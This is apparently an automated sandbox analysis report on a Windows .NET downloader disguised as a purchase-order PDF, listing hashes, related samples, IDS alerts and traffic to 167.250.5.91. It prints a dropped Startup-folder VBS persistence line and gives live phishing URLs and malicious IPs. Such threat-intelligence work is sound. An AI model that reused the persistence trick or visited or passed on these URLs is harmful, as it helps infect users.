                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS-COLOAMUSm68k.elfGet hashmaliciousMiraiBrowse
                                                        • 67.203.3.57
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 104.224.77.59
                                                        rYhL.exeGet hashmaliciousRemcosBrowse
                                                        • 67.207.161.204
                                                        LFcq74J1fZ.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                        • 67.207.166.175
                                                        Metal & Copper Technical Specification List.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        Metal & Copper Technical Specification List.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        Steel and Metal Coil Inquiry Sheet - Copy.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        Metal & Copper Technical Specification List.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        Steel and Metal Coil Inquiry Sheet - Copy.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        Steel and Metal Coil Inquiry Sheet - Copy.xlsGet hashmaliciousUnknownBrowse
                                                        • 67.207.166.175
                                                        NUTHOSTSRLARORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 167.250.5.91
                                                        PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                        • 167.250.5.91
                                                        SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 167.250.5.91
                                                        EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                        • 167.250.5.91
                                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                        • 167.250.5.91
                                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                        • 167.250.5.91
                                                        https://audiovoice-message.idc-builder.com/Get hashmaliciousUnknownBrowse
                                                        • 167.250.5.7
                                                        https://reportesud.com/conceal/nuns/426176721460/bWFya2V0aW5nQHN0b3Jtc2hpZWxkLmV1Get hashmaliciousHTMLPhisherBrowse
                                                        • 167.250.5.19
                                                        https://reportesud.comGet hashmaliciousUnknownBrowse
                                                        • 167.250.5.19
                                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 167.250.5.35

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eCONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        • 167.250.5.91
                                                        https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                        • 167.250.5.91
                                                        Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 167.250.5.91
                                                        PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                        • 167.250.5.91
                                                        CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 167.250.5.91
                                                        Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 167.250.5.91
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 167.250.5.91
                                                        Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 167.250.5.91
                                                        https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                        • 167.250.5.91
                                                        DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 167.250.5.91

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Roaming\Directory.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):80896
                                                        Entropy (8bit):5.775191029178188
                                                        Encrypted:false
                                                        SSDEEP:1536:8v12xY5B+RdtZTQjOAcC4LEVg33oBL4wEl2b8tCPq:02lsHg34BL4xl24X
                                                        MD5:7C53C51719C6402A25A4FACD1E62D01E
                                                        SHA1:ED60357ADFFD36224FDA167C12C37C4DB539AC47
                                                        SHA-256:077B69FEC403810DCD872D173CB0CB553ECE238A4700E0212A2F457FD8446458
                                                        SHA-512:2D4E97900A6623C04885348D1B9CF15F48B1D92341B378A016FFBBDD3484DC0EF74355CBD6E61B4DCC5718EDB8142D6A0E84B4C679032F621375FD99241E65FF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?g.................2...........P... ...`....@.. ....................................`..................................P..O....`............................................................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................P......H......................................................................?.C.:....g|........>~.g?..!.....t}....]...W........>6#S....>.....`T?.(.>_'.>.......&!?.V!......>&..^..f.....O.n?T.>b,.>.......xcm?>.........7.._...h".......{..7?..&.......w..9..8f........f?.Q.>........+.d?Y.............<.'....?......r?a.G..`}>....*..>..N.G......r6a?.?.>.Y.>....z..?AH2?...>....-'....|..Yk.....g....8..7.O?.........:u>..A.....,J.>..I...n.....q.Z...a..l......PY?6..>+l.....H...../.

                                                        C:\Users\user\AppData\Roaming\Directory.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):87
                                                        Entropy (8bit):4.6607887111969895
                                                        Encrypted:false
                                                        SSDEEP:3:FER/n0eFHHoN+EaKC5cbAdOn:FER/lFHIN7aZ5cbAdO
                                                        MD5:EFD84BDDF79C2A2BBB7CB71EF7EBF28D
                                                        SHA1:CA649FDD9418257A0736BF4038D04A15293DBEDF
                                                        SHA-256:261FC88202279CAA65B65B25F6284B37EF4CE3F6F6F0F1D6B3A8BBC234AECB62
                                                        SHA-512:CF006181B59D98BDD1445FA8F85E7F02948D873D1D34215714E0BC82E7E9F370328051A2DCC106492C5B2EA9601BD5AE84F69E387DB19D66FF8F1720DC63C2F1
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Directory.exe"""

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.775191029178188
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:PO#83298373729383838392387373873PDF.exe
                                                        File size:80'896 bytes
                                                        MD5:7c53c51719c6402a25a4facd1e62d01e
                                                        SHA1:ed60357adffd36224fda167c12c37c4db539ac47
                                                        SHA256:077b69fec403810dcd872d173cb0cb553ece238a4700e0212a2f457fd8446458
                                                        SHA512:2d4e97900a6623c04885348d1b9cf15f48b1d92341b378a016ffbbdd3484dc0ef74355cbd6e61b4dcc5718edb8142d6a0e84b4c679032f621375fd99241e65ff
                                                        SSDEEP:1536:8v12xY5B+RdtZTQjOAcC4LEVg33oBL4wEl2b8tCPq:02lsHg34BL4xl24X
                                                        TLSH:7583293C23DCCF2FC76D56B5E0B10650A734A2662623E7AB1F48797C3E66B5494123A3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?g.................2...........P... ...`....@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4150fe
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x673F07FD [Thu Nov 21 10:14:21 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x150ac0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x5b6.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x131040x13200d45683bebae49deadff0b904e812f1d9False0.4302236519607843data5.830662760781993IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x160000x5b60x600482fd2074b7413110ae6edfac58ada32False0.4192708333333333data4.107014871872352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x180000xc0x200743713dcbe03e33fe4abe295ab7eda4bFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x160a00x32cdata0.4248768472906404
                                                        RT_MANIFEST0x163cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-21T12:55:19.064876+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649742167.250.5.91443TCP
                                                        2024-11-21T12:55:21.388749+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649751167.250.5.91443TCP
                                                        2024-11-21T12:55:23.527060+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649757167.250.5.91443TCP
                                                        2024-11-21T12:55:25.679131+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649763167.250.5.91443TCP
                                                        2024-11-21T12:55:27.990266+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649769167.250.5.91443TCP
                                                        2024-11-21T12:55:30.187023+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649774167.250.5.91443TCP
                                                        2024-11-21T12:55:32.379422+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649782167.250.5.91443TCP
                                                        2024-11-21T12:55:34.587668+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649788167.250.5.91443TCP
                                                        2024-11-21T12:55:36.781418+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649794167.250.5.91443TCP
                                                        2024-11-21T12:55:38.920005+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649801167.250.5.91443TCP
                                                        2024-11-21T12:55:41.377908+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649806167.250.5.91443TCP
                                                        2024-11-21T12:55:43.787427+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649813167.250.5.91443TCP
                                                        2024-11-21T12:55:46.224391+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649821167.250.5.91443TCP
                                                        2024-11-21T12:55:48.519190+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649827167.250.5.91443TCP
                                                        2024-11-21T12:55:50.861981+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649834167.250.5.91443TCP
                                                        2024-11-21T12:55:53.006675+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649840167.250.5.91443TCP
                                                        2024-11-21T12:55:55.322109+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649847167.250.5.91443TCP
                                                        2024-11-21T12:55:57.413718+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649854167.250.5.91443TCP
                                                        2024-11-21T12:55:59.554000+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649861167.250.5.91443TCP
                                                        2024-11-21T12:56:01.695594+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649868167.250.5.91443TCP
                                                        2024-11-21T12:56:03.832908+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649873167.250.5.91443TCP
                                                        2024-11-21T12:56:05.977723+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649879167.250.5.91443TCP
                                                        2024-11-21T12:56:08.382481+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649886167.250.5.91443TCP
                                                        2024-11-21T12:56:10.787794+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649893167.250.5.91443TCP
                                                        2024-11-21T12:56:12.926447+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649901167.250.5.91443TCP
                                                        2024-11-21T12:56:15.008643+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649906167.250.5.91443TCP
                                                        2024-11-21T12:56:17.099817+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649912167.250.5.91443TCP
                                                        2024-11-21T12:56:19.188248+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649919167.250.5.91443TCP
                                                        2024-11-21T12:56:21.597410+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649925167.250.5.91443TCP
                                                        2024-11-21T12:56:23.682946+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649932167.250.5.91443TCP
                                                        2024-11-21T12:56:25.875811+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649937167.250.5.91443TCP
                                                        2024-11-21T12:56:28.074541+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649944167.250.5.91443TCP
                                                        2024-11-21T12:56:30.249783+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649950167.250.5.91443TCP
                                                        2024-11-21T12:56:32.730078+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649958167.250.5.91443TCP
                                                        2024-11-21T12:56:35.155641+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649964167.250.5.91443TCP
                                                        2024-11-21T12:56:37.322116+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649971167.250.5.91443TCP
                                                        2024-11-21T12:56:39.515142+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649977167.250.5.91443TCP
                                                        2024-11-21T12:56:41.712807+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649985167.250.5.91443TCP
                                                        2024-11-21T12:56:43.856606+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649992167.250.5.91443TCP
                                                        2024-11-21T12:56:46.011436+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649997167.250.5.91443TCP
                                                        2024-11-21T12:56:48.152065+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650004167.250.5.91443TCP
                                                        2024-11-21T12:56:50.298676+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650010167.250.5.91443TCP
                                                        2024-11-21T12:56:52.493850+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650016167.250.5.91443TCP
                                                        2024-11-21T12:56:55.053084+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650027167.250.5.91443TCP
                                                        2024-11-21T12:56:57.201996+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650033167.250.5.91443TCP
                                                        2024-11-21T12:56:59.494534+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650039167.250.5.91443TCP
                                                        2024-11-21T12:57:01.377052+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650045167.250.5.91443TCP
                                                        2024-11-21T12:57:03.531417+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650051167.250.5.91443TCP
                                                        2024-11-21T12:57:05.670744+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650058167.250.5.91443TCP
                                                        2024-11-21T12:57:07.811223+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650064167.250.5.91443TCP
                                                        2024-11-21T12:57:10.216587+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650068167.250.5.91443TCP
                                                        2024-11-21T12:57:12.319036+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650070167.250.5.91443TCP
                                                        2024-11-21T12:57:14.552418+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650072167.250.5.91443TCP
                                                        2024-11-21T12:57:16.752890+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650075167.250.5.91443TCP
                                                        2024-11-21T12:57:19.096679+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650077167.250.5.91443TCP
                                                        2024-11-21T12:57:22.530041+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650081167.250.5.91443TCP
                                                        2024-11-21T12:57:24.874345+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650083167.250.5.91443TCP
                                                        2024-11-21T12:57:26.966219+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650085167.250.5.91443TCP
                                                        2024-11-21T12:57:30.855047+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650089167.250.5.91443TCP
                                                        2024-11-21T12:57:32.994312+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650091167.250.5.91443TCP
                                                        2024-11-21T12:57:35.143349+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650093167.250.5.91443TCP
                                                        2024-11-21T12:57:37.312458+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650095167.250.5.91443TCP
                                                        2024-11-21T12:57:41.461641+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650100167.250.5.91443TCP
                                                        2024-11-21T12:57:44.994953+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650103167.250.5.91443TCP
                                                        2024-11-21T12:57:47.140055+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650105167.250.5.91443TCP
                                                        2024-11-21T12:57:49.278224+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650107167.250.5.91443TCP
                                                        2024-11-21T12:57:51.456730+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650109167.250.5.91443TCP
                                                        2024-11-21T12:57:54.459415+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650112167.250.5.91443TCP
                                                        2024-11-21T12:57:56.735469+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650114167.250.5.91443TCP
                                                        2024-11-21T12:58:00.079897+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650118167.250.5.91443TCP
                                                        2024-11-21T12:58:03.926683+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650121167.250.5.91443TCP
                                                        2024-11-21T12:58:06.066728+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650123167.250.5.91443TCP
                                                        2024-11-21T12:58:08.262570+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650125167.250.5.91443TCP
                                                        2024-11-21T12:58:10.459800+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650127167.250.5.91443TCP
                                                        2024-11-21T12:58:12.864223+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650129167.250.5.91443TCP
                                                        2024-11-21T12:58:15.112985+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650131167.250.5.91443TCP
                                                        2024-11-21T12:58:17.194955+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650133167.250.5.91443TCP
                                                        2024-11-21T12:58:19.335960+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650135167.250.5.91443TCP
                                                        2024-11-21T12:58:21.780744+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650137167.250.5.91443TCP
                                                        2024-11-21T12:58:23.866583+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650139167.250.5.91443TCP
                                                        2024-11-21T12:58:25.671688+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650141167.250.5.91443TCP
                                                        2024-11-21T12:58:27.946517+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650143167.250.5.91443TCP
                                                        2024-11-21T12:58:30.248570+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650145167.250.5.91443TCP
                                                        2024-11-21T12:58:32.700832+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650147167.250.5.91443TCP
                                                        2024-11-21T12:58:35.084564+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650149167.250.5.91443TCP
                                                        2024-11-21T12:58:37.494509+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650151167.250.5.91443TCP
                                                        2024-11-21T12:58:41.049823+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650154167.250.5.91443TCP
                                                        2024-11-21T12:58:43.133620+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650156167.250.5.91443TCP
                                                        2024-11-21T12:58:45.313091+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650158167.250.5.91443TCP
                                                        2024-11-21T12:58:48.390078+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650162167.250.5.91443TCP
                                                        2024-11-21T12:58:52.287001+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650166167.250.5.91443TCP
                                                        2024-11-21T12:58:55.625819+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650171167.250.5.91443TCP
                                                        2024-11-21T12:58:57.970817+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650173167.250.5.91443TCP
                                                        2024-11-21T12:59:00.160712+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650175167.250.5.91443TCP
                                                        2024-11-21T12:59:02.272862+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650177167.250.5.91443TCP
                                                        2024-11-21T12:59:06.863654+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650179167.250.5.91443TCP
                                                        2024-11-21T12:59:09.009681+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650180167.250.5.91443TCP
                                                        2024-11-21T12:59:11.154776+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650182167.250.5.91443TCP
                                                        2024-11-21T12:59:13.296696+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650183167.250.5.91443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 21, 2024 12:54:55.730349064 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:55.730436087 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:55.730531931 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:55.743861914 CET49707443192.168.2.6167.250.5.91
